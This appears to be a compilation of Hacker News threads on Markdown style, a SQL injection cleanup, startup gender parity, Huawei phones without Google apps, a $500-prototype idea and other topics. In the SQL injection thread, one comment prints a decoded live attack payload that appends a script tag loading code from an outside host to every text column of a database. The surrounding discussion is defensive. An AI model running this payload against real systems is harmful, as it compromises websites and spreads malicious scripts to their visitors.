Show HN: Markdown Style Guide - cirosantilli
http://www.cirosantilli.com/markdown-style-guide
======
cirosantilli
I'd love any kind of feedback. For more "precise", "well defined" issues, I
propose that you open an issue at
[https://github.com/cirosantilli/markdown-style-guide/issues](https://github.com/cirosantilli/markdown-style-guide/issues),
as it is more manageable.
------
amedstudent
I don't get the point of ignoring definition lists for your reason. The ones
you proposed are ugly.
If definition lists aren't supported then it's an inferior breed of markdown
and should be discontinued where possible
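For reference, the definition-list syntax under discussion is a Markdown extension (supported by processors such as PHP Markdown Extra and Pandoc, but not by the original Markdown) and looks roughly like:

```markdown
Term
:   The definition of the term, indented after a colon.

Another term
:   Definitions can span multiple lines
    if the continuation is indented.
```

In processors without the extension, a block like this renders as ordinary paragraphs, which is why style guides targeting lowest-common-denominator Markdown tend to fall back on plainer constructs.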
SQL "development" gone horribly wrong... - avner
http://boston.craigslist.org/gbs/sof/742662737.html
======
dizm
Decoded:
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT
a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN
EXEC('UPDATE ['+@T+'] SET
['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script
src=http://www.suppadw.com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE
Table_Cursor
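For anyone cleaning up after an attack like this: the cursor loop only works because the application concatenated user input straight into SQL text. A minimal sketch of the fix, using Python's stdlib sqlite3 driver as a stand-in for whatever database layer the site actually uses:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE comments (body TEXT)")

# A classic injection payload: tries to break out of the string literal.
payload = "x'); DROP TABLE comments; --"

# Vulnerable pattern (what gets sites hacked): building SQL by concatenation
# lets the payload terminate the literal and run its own SQL.
#   conn.executescript("INSERT INTO comments VALUES ('" + payload + "')")

# Safe pattern: a parameterized query sends the value out-of-band, so the
# payload is stored as inert text and never parsed as SQL.
conn.execute("INSERT INTO comments VALUES (?)", (payload,))

stored = conn.execute("SELECT body FROM comments").fetchone()[0]
print(stored == payload)  # True: stored verbatim, nothing executed
```

The same placeholder idea exists in every mainstream driver; only the marker syntax (`?`, `%s`, `@param`) differs.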
------
PStamatiou
shared hosting? get your own box, turn off apache for a while and go through
code with a fine tooth comb.
~~~
ajross
SQL injection attacks have nothing to do with whether they are on a shared box
or running in a locked down cage. If they have any hope of fixing this mess,
they need to start from advice that helps, not voodoo.
~~~
PStamatiou
I just meant if they had their own box they would have more control over it..
they said they had to wait for a support guy with perms to do the db restores.
------
sabat
- all web input needs to run thru the same filter
- that filter disallows SQL keywords
- you're done
If this guy wasn't on a shared host, he could just install mod_security and
its default config should take care of it. Presuming Apache of course.
~~~
LogicHoleFlaw
I think ANDrew, TOny, SETh, and BYron might have problems with that filter.
~~~
sabat
They might if the programmer didn't have the sense to surround the keywords
with word boundary markers. You know, something like %20SET%20 etc. I do this
successfully with mod_security, and a good regex kit will let you do this
easily.
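To make the word-boundary point concrete, here is a stdlib Python sketch of the same idea (real mod_security rules are also regex-based, but look different):

```python
import re

SQL_KEYWORDS = ["SELECT", "UNION", "AND", "OR", "SET", "DROP"]

# Naive substring filter: flags innocent names like ANDrew or SETh.
def naive_filter(s: str) -> bool:
    return any(k in s.upper() for k in SQL_KEYWORDS)

# Word-boundary filter: the keyword must appear as a standalone token.
bounded = re.compile(r"\b(" + "|".join(SQL_KEYWORDS) + r")\b", re.IGNORECASE)

def boundary_filter(s: str) -> bool:
    return bounded.search(s) is not None

print(naive_filter("ANDrew TOny SETh BYron"))     # True  (false positive)
print(boundary_filter("ANDrew TOny SETh BYron"))  # False (names pass)
print(boundary_filter("name' AND '1'='1"))        # True  (injection caught)
```

Keyword blacklisting is still a last-resort mitigation; parameterized queries remain the actual fix.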
Designing for the iPhone is a refreshing experience - (37signals) - dawie
http://www.37signals.com/svn/posts/475-designing-for-the-iphone-is-a-refreshing-experience
======
jsjenkins168
The problem is that the "constraints" are controlled by one company. Its not
an open standard others can share.
History has shown this is bad and stunts innovation (think MSFT)
Why We're Missing Our Best Chance for Gender Parity - hugs
https://devmynd.com/blog/2015-2-mind-the-gap
======
emiliobumachar
"When I'm hiring, I have an HR intern (or the external recruiter) strip
anything that could indicate gender or race from the résumés before they get
their initial evaluation. For the ones that make the first cut, I have the
recruiter print out code from Github, with the username redacted. This has
resulted in a tremendous increase in the number of women who make it through
to an actual interview."
In orchestras, there was a tremendous increase in the number of women when the
practice of having candidates play their instruments invisible to the judges
became widespread.
------
cpks
Let me give an alternative explanation, championed by Philip Greenspun for
women in science jobs: Startup jobs suck, and women are better at recognizing
it (scroll past the description of science jobs to "Why do American men
(actually boys) do it?"):
[http://philip.greenspun.com/careers/women-in-science](http://philip.greenspun.com/careers/women-in-science)
There are no economics by which working at a startup makes sense over a
Facebook or a Google. You work longer hours, and make substantially less.
Unless you're a founder, even in the event of a successful exit, the stock
options will generally barely cover the cost of the paper they're written on.
Early employees don't come out competitive with Google until you see billion-
plus dollar exits.
Philip's claim was that men tend to make decisions based on testosterone-
fueled machismo, and go into areas considered "hard-core" like theoretical
math, which rationally, are a waste of time and make no sense to study. As he
phrases it, young men make the decision based on:
1. young men strive to achieve high status among their peer group
2. men tend to lack perspective and are unable to step back and ask the
question "is this peer group worth impressing?"
This matches my anecdotal experience as well. Women tend to make more rational
decisions, and pursue fields with a higher return-on-investment. Men tend to
make irrational decisions, and either realize it later (with colossal
failures, such as science jobs), or rationalize it later (e.g. "I learned a
lot" without really comparing to the alternative -- a job with formal
mentorship processes, and both pay and work/life to allow time for pet
projects and formal study).
If Philip's claim is correct -- and it does match my anecdotal experience --
the way to draw more women into startups would be to make them appealing to
rational players. Typically, an early employee ends up with a fraction-of-a-
percent equity at exit (and at best, low single-digit percent at joining).
Equity is allocated in numbers (5000 shares) rather than percent, in a
successful attempt to confuse.
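To illustrate the shares-vs-percent confusion with hypothetical numbers (every figure below is assumed for illustration, not from any real offer):

```python
# All numbers hypothetical, chosen only to show the order of magnitude.
shares_granted = 5_000
fully_diluted_shares = 10_000_000   # assumed total shares outstanding
ownership = shares_granted / fully_diluted_shares

exit_value = 100_000_000            # assumed $100M exit

print(f"ownership: {ownership:.4%}")              # ownership: 0.0500%
print(f"payout: ${ownership * exit_value:,.0f}")  # payout: $50,000
# ...and that is before further dilution and liquidation preferences.
```

"5,000 shares" sounds substantial; "0.05% of the company" invites the obvious follow-up question about the denominator, which is exactly why offers are quoted in shares.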
Is it a full explanation for 2% vs. 28%? Probably not. Bias is surely part of
the equation as well. I have no idea what the split is, but I'd be shocked if
either explained the gap fully, and I'd be equally shocked if either were
insignificant.
~~~
eurleif
>Philip's claim was that men tend to make decisions based on testosterone-
fueled machismo, and go into areas considered "hard-core" like theoretical
math, which rationally, are a waste of time and make no sense to study.
If no one did theoretical math or startups, the world wouldn't advance. There
wouldn't be a Facebook or a Google to work at. People can rationally pursue
goals beyond their own financial interests.
~~~
cpks
1. You're confusing theoretical math with applied math. Google doesn't benefit
from algebraic topology.
2. Startups would exist -- just not as many. The cost would be slightly
higher; they'd have to either pay employees fair salaries or give fair levels
of equity. The current situation -- long hours, low salary, crooked options --
would not persist.
~~~
eurleif
>You're confusing theoretical math vs. applied math. Google doesn't benefit
from algebraic topology.
Not yet, maybe. But it does benefit from number theory, which was considered
to have no practical applications until people realized we could do encryption
with it.
~~~
cpks
Two ways to look at it:
1. Return on investment. Every hour spent on applied math generates a lot
more applications (not to mention elegant mathematics) than the same spent on
theoretical math. Theoretical math has about as much value as knitting and
crochet. Does someone occasionally come up with something of value? Sure. Does
it have more value than any other hobby? Not really.
2. With encryption in particular, Diffie-Hellman is simple enough that public
key would have been created regardless of research in theoretical math.
Furthermore, most of the people developing such (including Diffie, Hellman,
Merkle, Rivest, Shamir, Adleman, etc.) have applied backgrounds. Indeed, most
are computer scientists, rather than mathematicians. The same goes for
cryptographic protocols, doubly so. Symmetric encryption, in contrast, does
build a _little_ bit on theoretical math, but it's also just an arms race.
More knowledge about number theory helps both cryptography and cryptanalysis
about equally. There's no reason to believe that more number theory makes us
in any way more secure. Cryptography itself would exist without number theory
(indeed, history is a bit fuzzy as to whether something like the scytale or
number theory came first, and regardless, there is no reason to believe one
fed the other).
Huawei Mate 30 phones launch without Google apps - amaccuish
https://www.bbc.co.uk/news/technology-49754376
======
AdmiralAsshat
Would've been a golden opportunity to get a billion users onto F-Droid's
store, but, more likely Huawei will simply launch with their own, tightly-
integrated "Huawei app store". It may even be _worse_ from a security
perspective, since there is zero expectation that the apps Huawei provides
through their own store should be FLOSS.
~~~
Animats
Now app developers have a big incentive to avoid Google Play Services and run
on open-source Android. That lets them run on Google, Huawei, and F-Droid
platforms.
Time for a dev forum on migrating away from Google Play Services.
~~~
mooman219
You could say the same about Vulkan vs Metal, or Chrome vs the world, or
Windows vs the world. The bulk of developers are going to target the subset of
technologies that let them do what they want to do in the easiest way possible
while targeting the largest userbase. I assume this isn't going to change the
playing field in a significant way.
~~~
close04
Usually a good incentive for devs is a higher cut of the sales. But I’m not
sure how much Chinese users usually contribute to a dev’s revenue stream
compared to US or EU users for example.
I remember reading a while ago that iOS is an attractive OS to target because
the users tend to spend more in apps than the average Android users. If the
average Chinese users spend even less it may be a disincentive. Not sure if
this is still the case.
------
sandworm101
A phone without Google or Apple? I'm no fan of Huawei but credit where credit
is due.
I'm still waiting for a reasonable phone that will allow me to install my own
OS and, more importantly, dump the OS and go with something else when it
annoys me.
~~~
missosoup
Yeah, because a phone imaged by an entity controlled by the CCP is better than
a phone without Google or Apple.
I'm no supporter of either Apple or Goog, but applauding a mass spyware device
from the CCP would be satire a couple years ago.
It's not like they have a track record of subverting phones for targeted
genocide or anything[1]
[1]
[https://www.schneier.com/blog/archives/2019/09/massive_iphone_.html](https://www.schneier.com/blog/archives/2019/09/massive_iphone_.html)
~~~
xwolfi
Dude, the US spied on undersea fiber to steal contracts from companies in my
(democratic) country.
Say what you want about the chinese, but they're not the only ones playing
that game.
~~~
truculent
> but they're not the only ones playing that game.
The original comment is literally comparing Huawei favourably to its US
counterparts, though.
------
bubblethink
>"It forced us to use the HMS [Huawei Mobile Services] core."
This is the major failure I see here. Basically, no one wants Huawei's blobby
bloatware with system level privileges any more than Google's blobby bloatware
with system level privileges. If the world thinks that you are a Chinese
spying company, you do not combat that by shipping more crap. They had a good
opportunity to either extend AOSP or to make HMS open source. Instead, they
imitate Google poorly.
~~~
tinus_hn
There are plenty of people who simply don't care about that; they just want a
cheap and pretty phone.
------
Synaesthesia
Quite impressive hardware. The fact that 5G is integrated in the SoC is a
first, display looks great too.
I’m sure you can still use apps like YouTube and Gmail via the phone’s
browser; that’s what I do on my iPhone.
~~~
Havoc
Yeah bought a Huawei tablet & thought same. Good bang per buck on hardware
even with questionable associations.
------
sreyaNotfilc
After seeing the iPhone 11 Pro, Pixel 4, and the Mate 30 Pro, I have to say
that the Mate 30 implemented the triple camera best. It's less of an eyesore
in the center of the device than in the top left corner.
Also, the bezel around it makes it look like a device that's a phone and a
camera, instead of "hiding the fact" that it's a phone that happens to have
photo capabilities. I really like the design.
Too bad for the lack of Android/Google apps, for I would have considered
getting one.
~~~
lunchables
>It's less of an eyesore being in the center of the device instead of the top
left corner.
I genuinely have no idea what the back of my phone looks like. All I'm
concerned with is the quality of the photos it takes.
~~~
sreyaNotfilc
I somewhat agree. Yes, the back isn't that noticeable when actually using it.
But it's noticeable now, even to the point where people I know who love their
iPhones say that it's "ugly".
Apple is not known to make "ugly" devices. Their devices are practical and
engineered thoughtfully.
Having the camera in the top left corner as opposed to the center seems like a
mistake to me. Especially since they are promoting the camera to be a
significant upgrade. Put it front and center!
Apple's device history (at least under Jobs) was always to ship a fully
functional, revolutionary machine that was easy to use and beautiful inside
and out. They've been that way since the Macintosh. The look was more user-
friendly and approachable. They even signed the inside of the box as if they
were presenting a piece of art. Even the font-face they introduced was to
promote artistry in the technical world.
My point is, the iPhone 11 is an amazing device, but the look of their biggest
new feature, the cameras, does not fit well with their history of artistic
prowess. Steve Jobs would have never OKed this design placement.
------
fakeslimshady
Now all this means is the user needs to install apps themselves rather than
use the pre-installed bloatware. A clean start might actually be preferable
for a lot of people.
------
sharpneli
I find it hilarious when reading news like these to remember that the official
stance of US government is that their national security is endangered if that
phone ships with Google Play.
EDIT: It actually is national security
([https://www.google.fi/amp/s/www.cnet.com/google-amp/news/trump-says-he-doesnt-want-to-do-business-with-huawei-due-to-national-security-threat/](https://www.google.fi/amp/s/www.cnet.com/google-amp/news/trump-says-he-doesnt-want-to-do-business-with-huawei-due-to-national-security-threat/))
~~~
mosselman
I am not an expert, but I doubt that this is an accurate characterisation of
the reasons for the ban. Isn’t this more about intellectual property issues
and economic disagreements?
~~~
HenryBemis
I think it is mostly political. When one uses Google Maps, they tell the USA's
3-letter agencies where they are. If Huawei replaces Google Maps with "Huawei
Maps" then the USA stops getting that info, and China gets it. Now apply the
same to emails, text messages, etc.
I believe that even "innocuous" games (started playing AFKArena lately)
collect the IP address of my phone and tell the lovely Chinese gov who I am,
where I am, etc. (AFKArena policies have the word Tencent a lot in them).
~~~
mda
You imply security agencies have direct, uncontrolled online access to Google
Maps personal data today; this is not true. There is due process for accessing
private data, and you always have the option to enable, disable, or delete it.
Let's stick to the facts.
~~~
HenryBemis
You imply that they don't. If the Wikileaks/Snowden story and the AT&T (room
641A) story taught us anything, it is that we cannot place any reliance on due
process, and that 3-letter agencies harvest anything they can, any way they
can, without any respect for privacy (big laughter here) or due process.
I am not trashing security agencies. I am merely stating that lines in the
sand never seem to have stopped them before and most likely won't stop them
now (or in the future).
Whether it be the AT&T case or a bribed sys/net admin, "they" want it all, and
they have the budgets to get it done.
------
jankotek
> firm had set aside $1bn (£801m) to encourage developers to make their apps
> compatible
It also launched without Google Services. This could be a great push towards a
completely open-sourced Android platform.
~~~
rasz
Reminds me of a time MS was paying hundreds to thousands of dollars for
garbage calculator/flashlight Windows Phone apps.
------
ThinkBeat
Well I think that makes the phone more attractive. Something that doesn't
report everything I do to Google.
Huawei should market the shit out of that.
Blackphone sells (or maybe used to sell) a hardened version of Android without
the Google spyware, but version 2 was really expensive and made in small
quantities.
This Mate30 will be mass-produced. They could make this the favorite privacy
phone. (Well privacy from the US surveillance state)
~~~
frequentnapper
Yeah instead you get a device that reports everything to the Chinese
surveillance state which is much worse.
------
tibbydudeza
Excellent specs and cheap compared to the competition.
I am sure some enterprising folks on XDA will come up with a nifty easy
utility to "googlyfi" your new Huawei phone.
Also won't surprise me if some phone shops will take the initiative and do it
out of the box before selling it to you.
~~~
commoner
As long as Huawei continues to ship phones with locked bootloaders that can't
be unlocked, that is simply not going to happen.
[https://www.xda-developers.com/xda-huawei-decision-stop-bootloader-unlocking](https://www.xda-developers.com/xda-huawei-decision-stop-bootloader-unlocking)
[https://www.xda-developers.com/huawei-mate-30-google-play-store-challenges](https://www.xda-developers.com/huawei-mate-30-google-play-store-challenges)
You won't be able to root Huawei phones, much less customize the stock OS to
any meaningful extent. You also won't be able to change the OS (to something
like LineageOS).
------
thefounder
I guess that's a feature... plus the iPhone camera seems a joke in comparison
with the Mate Pro.
~~~
bdcravens
Ditto for the Galaxy Note 10
------
lph
Did Huawei not see what happened with the Amazon Fire Phone or Windows Phone?
If you launch a phone with an anemic ecosystem, it will fail.
~~~
dragonelite
They are pressured to do this, if the US wasn't so dickish about it they would
just release a certified Android.
------
londons_explore
Will it have a locked bootloader?
Previous Huawei phones have all had a fairly robustly locked bootloader. Now
it seems there is quite some incentive for them to make the bootloader
unlockable to make inserting GMSCore easier...
One could imagine an underground network of US based people reflashing these
phones to have Google services.
~~~
bubblethink
You don't need an unlockable bootloader for that. They ship stub packages that
can be updated later by the user [1].
[1]: [https://www.xda-developers.com/huawei-mate-30-google-play-store-challenges/](https://www.xda-developers.com/huawei-mate-30-google-play-store-challenges/)
------
xster
[https://twitter.com/cybnox/status/1174722533377085444](https://twitter.com/cybnox/status/1174722533377085444)
This is probably a key conversation. In other words, we don't really know yet
what part of GMS dependent apps will or will not work.
------
GFischer
It's going to kill overseas sales for them. Both my gf and I have Huawei
phones, but our next phones will be Xiaomi.
Fortunately the U.S. didn't kill all Chinese manufacturers; Samsung and the
rest are overpriced compared to them.
------
sajithdilshan
This is quite interesting. I assume there are 3rd-party alternatives for most
of the essential Google apps, which let you access Google services like Gmail
or YouTube.
~~~
fspeech
You can access GMail or YouTube from your browser. I don’t install the apps on
my phone.
~~~
HenryBemis
The worst spy on our Android phones is Google Play Services. For some magical
reason, when I firewall Google Play Services I stop receiving ANY
notifications (Signal, emails, etc.). For some reason all these are routed
through Google. I wonder how much of a coincidence/mishap that is in the
architecture.
Does anyone know why, if I can bypass it?
~~~
dannyw
Play Services does handle all push notifications. The 'some reason' is battery
life, because your phone shouldn't maintain 30 long-lived connections.
From the privacy aspect, I believe all notifications are end to end encrypted
actually. Same as Apple.
~~~
HenryBemis
Encrypted, but that's in transit. Does Google read everything, or is the only
thing transferred the alert and NOT the Signal/text/WhatsApp message itself?
~~~
smush
Signal is e2ee, so Google Cloud Messaging should only get the alert itself;
the encrypted message is then downloaded from the server and decrypted on
device.
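A toy model of the flow described above. Everything here is illustrative: the XOR keystream is an insecure stand-in for Signal's real encryption, and the dicts stand in for FCM payloads and server APIs.

```python
import hashlib

def toy_cipher(key: bytes, data: bytes) -> bytes:
    # INSECURE toy: XOR with a SHA-256-derived keystream. It only stands in
    # for real end-to-end encryption; never use anything like this for real.
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))

shared_key = b"known only to the two endpoints"
message = b"the actual chat message"

# Sender uploads ciphertext to the messaging server...
server_mailbox = toy_cipher(shared_key, message)

# ...while the push relay (FCM) carries only a content-free wake-up ping.
push_payload = {"wake": True}  # no message text ever transits Google

# On wake, the device pulls the ciphertext and decrypts it locally.
plaintext = toy_cipher(shared_key, server_mailbox)
print(plaintext == message)  # True
```

The point of the structure: the relay learns that a message arrived (timing metadata), but never its content.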
------
chvid
27 W wireless charging!
~~~
josho
I assume this is going to generate excessive heat. My understanding is that
batteries age poorly from heat stress, so I am curious what routine 27 W
wireless charging will do to battery life.
~~~
14
I was just looking and could not find anything concrete but did see it was
expected to use a non-removable battery. That is not a huge problem as long as
they designed it to be fairly easily changed and if that is the case then I
would gladly trade battery life for fast charging. I guess time will tell on
this one but good question.
------
jdofaz
Why are the Facebook apps not blocked by the blacklist?
------
Zenst
For some this will be bad news, but others will view it as good news. Mixed
blessings, then, though common core users will see it as bad.
However, eventually services and the phone will be separated, and we will end
up with phones like we did with the browser-selection option thrust upon you,
giving you the choice even if you choose what you had originally.
Fun times ahead. In the end, I feel the consumer will get a better deal, and
as geeks who love to hack away at our phones, we may get an easier life.
------
doorslammer
i'm no expert, but here's a checklist of where Google can be found:
1. Your phone's operating system
2. Gallery manager
3. E-mail
4. Google music player
5. Google video player
6. YouTube app
there's more but your time is precious and maybe you already know all these
but don't care.
let's imagine your phone was a person... he had like a gazillion types of
cancer. from birth.
------
KirkNY
Video of our team's analysis on this subject:
[https://youtu.be/3bl4pXd2Sqc](https://youtu.be/3bl4pXd2Sqc)
~~~
mcraiha
Might be a good idea to mention what your team is.
~~~
askl56
Applico and they don't seem to understand how the Chinese phone market works.
Great roundup of the best PS3 games in its swan-song year... - adambunker
http://www.redbull.com/uk/en/games/stories/1331622505248/ps4-ps3-vita-sony-playstation-gaming
======
samworm
This is nowhere close to the PS3's swansong. The PS2 was on sale until Jan of
/This Year/! So the PS3 will be around for a long time yet...
------
thelonelygod
This would have been great for me this morning. My local used game store was
doing a half-off-all-games sale, and I have just bought a PS3.
Invalidate this startup idea - 500 dollar prototype - padseeker
I had an idea based on my many conversations with non-techies with web or
mobile app based ideas. It seems they always spend way too much on building
their idea from scratch, even if they use offshore resources, OR they forgo it
completely as it is too hard to manage.

I've lost track of the number of times I've put palm to forehead while
listening to a non-techie tell me how they spent thousands building their idea
from scratch, when they could have used something that was already built -
like a wordpress plugin, a rails or django clone with some extra work, or
goodness knows what else. But they never even thought to ask around about
other avenues.

So here is the idea - A proposer (a non-techie type) posts their idea, and a
bunch of technically savvy hacker news types propose ways to build the
prototype for 500 or less, and people up/down vote stuff like stackexchange.
Perhaps use crowdsourcing for others to up/down vote the proposals. The
winner builds it for 500, minus a nominal fee that goes to the company.

The proposer can always continue using the builder of the prototype after the
prototype is built, or they could take it to someone else. And 500 bucks is
not chump change, but it isn't a huge investment on the part of the proposer.

Just upvote this post if you would consider putting your hat in the ring to
build a prototype for $500, or at least vote in other proposals.
======
bitcoder
I guess the concept is ultimately a two-sided market of 'proposers' and
'builders', so the challenge would be balancing them effectively.
I think it's unlikely you'd ever have a problem with too many builders and not
enough ideas. I think the challenge will be attracting builders (i.e.
developers) who are willing to build these prototypes.
As you've probably heard, developers are in high demand right now. A hacker
worth his salt is probably charging at least $100/hr, so $500 for a prototype
doesn't sound that attractive.
------
stevejalim
Affordable prototypes make sense, but what about the $500 level setting false
expectations for the cost of the production-quality app? If you're pitching
this at non-techies, you'll also have to get them over the hump of realising
that a lash-up is easily an order of magnitude cheaper than a decent, real-
world-robust version.
"Hey, WTF are you doing quoting me £5000 for a full build of this app? I had
the prototype done for $500 and it does almost as much as the real one I
want."
------
xoail
Hate it. A decent developer based out of United States will not be able to
work out the prototype for anywhere near $500. That means you open doors for
off-shore devs/companies to bid and try winning the project, acting exactly
like other hundreds of freelance sites. No one will up-vote proposals of the
competition. I don't see how this is different from any other freelance
marketplace sites out there other than putting a hard limit of $500 max. The
poster still has to work hard in preparing the requirement of the prototype,
answering questions and managing deliverables. Prototype also has
expectations, designs, creatives, tests and what not. It's better to just hire
a local person/friend. In general I feel freelance market places are hurting
the economy of the country.
------
DanBC
A neat idea. It's a nice fit with something like Bountify (you'd use bountify
for the smaller things, and your site for the larger projects).
Here are a couple of questions. These aren't meant to be bashing or knocking!
Sorry if they sound that way.
* How will you cope if an idiot claims to be able to do something, and wins, and then makes an awful mess of things?
* How does licensing work? If Ann writes some code for Bob who owns the code? (And if Ann is working at some place that claims ownership of all her code, do they own this?)
~~~
padseeker
you could I guess have a process - for custom apps the winner needs to post
their code on github, and others can review the deployed app on heroku? There
are plenty of holes with that as a technical person could pose as a non techie
then grab the code and make off with it. But the proposer's money would be in
escrow, and if the finished product works and, oh i dunno if the other hackers
give it the stamp of approval....
That is a whole other can of worms: enough vindictive hackers could vote a
working idea down. I'm making this up as I go along, and I'm willing to be
swayed in a different direction.
------
soupangel
My main problem with this proposal is that WE all know that $500 buys you a
rough prototype or a proof-of-concept. But a quick search through Elance or
oDesk shows that there are many, many potential clients who seriously expect a
fully-polished product for that amount. What happens to the poor contractor
when the client comes back with a huge changelist, which they're expected to
complete before getting paid?
Having said that, there was a pretty successful version of this idea
implemented for designers a while back.
~~~
soupangel
99designs.com was the link, took me a while to remember
------
padseeker
Thanks for all your comments - this post has certainly generated a bit of
interest and there are some interesting ideas I'm going to have to consider.
Although 11 points (at 9:30 EST) is hardly justification for building the
thing out. If I get to 50 maybe I would consider it.
The funniest part is to see the comments coming from each end, the Dev person
saying "I can get $100 per hour, why would I do it" versus the business person
who counters "I can get it built for less than $20 per hour on ODesk". I think
there is an opportunity here. It's not easy to find and manage an offshore
resource, and there are not that many people who can justify paying $100 an
hour.
------
ashraful
This is something that I've toyed with. I wanted to offer a service to build
an MVP for as low as $999. Living in a third-world country where a lot of very
talented developers work for a lot less is an advantage that I had.
On my first try, my value proposition wasn't clear enough and I clearly needed
to spend more time on the whole presentation. However, I think the idea still
has merit, and it's something I'll try again.
------
jamesjguthrie
I quite like this idea and could maybe see myself posting on a site like this.
What I don't like is the "500 or less" part; at that point it becomes a
bidding war and will inevitably be taken over by India-based devs, just like
every other coder-for-hire site.
------
alokhar
Cool idea, but one question: are you talking about developers ripping off non-
techies by building the idea from scratch, or the non-techies themselves
trying to build it from scratch because they don't know better alternatives?
------
maxbrown
I think this becomes more compelling if you offer multiple price points and
try to set delivery expectations at each level. I'm not sure how much can be
built at $500 while maintaining reasonable $/hr rates.
------
kennywinker
Sounds like a subreddit, not a website. </irony>
~~~
padseeker
yeah, I think that is a valid criticism. Actually it feels a lot closer to a
Stack Exchange site, apart from needing a way to transfer a payment from one
person to another. I like how Stack Exchange tracks reputations and allows
people to up/down vote answers to questions.
------
vlokshin
Hmmmm... LaunchSky.com definitely comes to mind
------
Mz
I am a non-techie. I _think_ I need to learn the technical part to make my
thingamawhop. I don't think it will fly otherwise. Maybe my situation is
unique. Maybe not. What if it is not? What if a lot of non-techies need to
learn and grow with the process of trying to breathe life into their idea?
What if your idea amounts to the guy who snipped the cocoon to make things
easier on the emerging butterfly, thereby tragically crippling it and
permanently denying it the ability to ever fly?
~~~
bradleysmith
I am a non-techie that also believes I ought to learn the technical part to
breathe life into my thingamawhop.
I would still love the ability to know if someone could make it right now
right now for $500.
If you snip the cocoon by putting it on doitfor500.com, that's on you, right?
Where there's a want, there's a product. I'd post my thingamawhop.
~~~
Mz
He asked to be invalidated. I was giving him the feedback he requested. I am
someone who routinely either gets useless pats on the head or hatred from
people. I can't fucking get anyone to engage me in meaty discussion of the
issues. And that fact is helping to ensure that my thingamawhop will be
stillborn or miscarried entirely.
Perhaps he doesn't appreciate being given what he asked for. Perhaps like
everyone else on planet earth, he will not take my feedback seriously and will
merely be defensive like it is a personal attack and not a well meaning,
honest critique. And, gee, that's on him what he does with it. But he did ask
for people to try to poke holes in his idea, presumably on the theory that it
would help him uncover weaknesses and thereby improve the darn thing. But
maybe it was just pc bs, like most of the blather on the face of the planet.
~~~
padseeker
If you think it is invalid that is a perfectly acceptable response. You made a
point and I countered. No need to get hostile Mz. I'm just glad you took the
time to respond. Your feedback is appreciated, even if the answer is "your
idea isn't worth building".
I want to hear what your thingamawop is - please share. Maybe this is the
start of doitfor500, and you get the first version for free. Or at least we
put you on the right path if you do it yourself. I'm really curious now what
it is.
~~~
Mz
You seem to have missed my point entirely. I gave you the feedback you
requested. That doesn't mean "it isn't worth building". That means I respect
you enough to help you try to find the weaknesses before you build the damn
thing, in hopes that it will hurt less should you actually launch. And if you
can't come to terms with that, life will get really painful when you do go
public with it.
My thingamawhop: I nearly died just about twelve years ago. Then I was
diagnosed with "atypical cystic fibrosis". I have spent the last twelvish
years getting well when the entire world thinks that is impossible. I would
like to write a simulation -- aka "game" -- to more effectively share my
mental model. But it might never happen. I get accused of having Munchhausen
Syndrome rather than cf. Most people with cf have made it abundantly clear
that they would rather die a slow torturous death than speak to me at all. And
I have been lovingly called a "troll" by the good people of hn for trying to
get feedback to resolve my problems.
Sorry if I am a tad raw over the whole thing. This kind of bullshit has gone
on for years. It likely won't end. Ever.
Best of luck with your idea.
Windows 10 to be released by Microsoft in July - aymenim
http://www.bbc.com/news/technology-32962830
======
deciplex
That's nice.
In fact I just learned that Microsoft is now in the business of installing
malware on their own damn operating system (perhaps I'm late to the party on
this). No, I'm not talking about them pre-installing Candy Crush on Windows 10
- that's just a shitty P2W skinner box app - not technically malware. Rather
I'm talking about the notification that is appearing in the system tray of
every fucking installation of Windows 7, Windows 8, and Windows 8.1 now. Yes,
you can remove it (by uninstalling the update responsible for it KB3035583 and
then also hiding it), and no, you shouldn't have to do this.
I don't think I want to install any more software from these brain-damaged
assholes.
Translating music into visual art - vmarsy
http://www.notesartstudio.com/about.html
======
vmarsy
As pointed out in _What Musical Notes Can Look Like_ [1], Music is sound,
there can be multiple ways to represent it visually. The link above is such an
example.
From the About section: _This artwork is created by a mathematical algorithm
that converts an entire piece of music from its natural domain of time and
frequency into a domain of space and color, relying on Fourier transforms,
graph theory, sparse matrix methods, and force-directed graph visualization,
to create visual music._
[1]
[https://news.ycombinator.com/item?id=12159224](https://news.ycombinator.com/item?id=12159224)
Frie Otto – Modeling with Soap Films (c. 1961) [video] - rfreytag
https://www.youtube.com/watch?v=-IW7o25NmeA
======
lenticular
Soap bubbles behave kind of like catenary curves. They want to minimize their
surface area (which has potential energy), but also want to reduce their
gravitational potential energy. The surface tension of bubbles behaves much
like elasticity of thin solids.
It makes sense then that this would be a useful model for shapes of elastic
structures whose thickness is much smaller than the horizontal length scale.
Such structures should be built to be in an energetically favorable
configuration, otherwise they'll sag like a loosely-pitched tent.
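As a side note on the shapes involved (standard results, not stated in the
video): with gravity negligible, a soap film spanning two coaxial rings
relaxes to a catenoid, the surface of revolution of the catenary profile

```latex
% Catenary profile; the constant c sets the scale:
y(x) = c \cosh\!\left(\frac{x}{c}\right)
% A soap film minimizes area, so its mean curvature vanishes everywhere:
H = \frac{\kappa_1 + \kappa_2}{2} = 0
```

Gravity then perturbs this minimal-surface shape, which is the sag effect
described above.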
~~~
buckthundaz
Yes, have a look at this study for visuals:
[https://wewanttolearn.wordpress.com/2012/11/14/plateaus-
laws...](https://wewanttolearn.wordpress.com/2012/11/14/plateaus-laws-soap-
bubbles-grasshopper/)
~~~
theoh
That is a nice Grasshopper project. This application of Plateau's laws is
limited to an idealised and very regular geometric situation, though. More
general problems can be solved with the Surface Evolver, which, like Frei
Otto's form finding experiments, can evolve membranes (starting from a certain
initial configuration and geometric constraints) under gravity and particular
bending energies.
[http://facstaff.susqu.edu/brakke/evolver/](http://facstaff.susqu.edu/brakke/evolver/)
The Willmore energy is a neat way to get smooth or "fair" bubble-like
surfaces.
